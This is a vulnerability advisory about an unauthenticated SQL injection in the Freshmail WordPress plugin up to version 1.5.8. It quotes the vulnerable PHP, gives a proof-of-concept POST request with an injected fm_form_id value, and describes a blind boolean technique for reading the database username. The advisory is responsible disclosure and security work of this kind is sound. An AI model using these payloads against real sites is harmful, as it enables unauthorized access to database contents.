Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> # Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6 # Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu) # CVE : N/A # Category: webapps 1. Summary ------------------ Freshmail plugin is an email marketing plugin for wordpress, allowing the administrator to create mail campaigns and keep track of them. There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter *fm_form_id. * 2. Vulnerability timeline ---------------------------------- - 04/05/2015: Identified in version 1.5.8 and contact the developer company by twitter. - 05/05/2015: Send the details by mail to developer. - 05/05/2015: Response from the developer. - 06/05/2015: Fixed version in 1.6 3. Vulnerable code --------------------------- Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50 [...] Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func'); Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func'); [...] Line 44: $result =3D $_POST; [...] Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms where form_id=3D"'.*$result['fm_form_id']*.'";'); [...] 3. Proof of concept --------------------------- POST /wp-admin/admin-ajax.php HTTP/1.1 Host: <web> X-Requested-With: XMLHttpRequest [...] Cookie: wordpress_f30[...] form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and "a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F 4. Explanation --------------------- A page visitor can submit an email (fake@fake.com) to subscribe to the formulary with fm_form_id=3D"1" and the JSON message received will be simil= ar to: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Your sign up request was successful! Please check your email inbox.*"} The second time he tries to do the same with the same email the message returned will be: {"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1* ","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s= uccess","message":"*Given email address is already subscribed, thank you!*"} If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa= me message indicating that the Given email is already subscribed indicating that the first character of the username is an "a" or a null message indicating that the username first character is not an "a". 5. Solution --------------- Update to version 1.6 Source
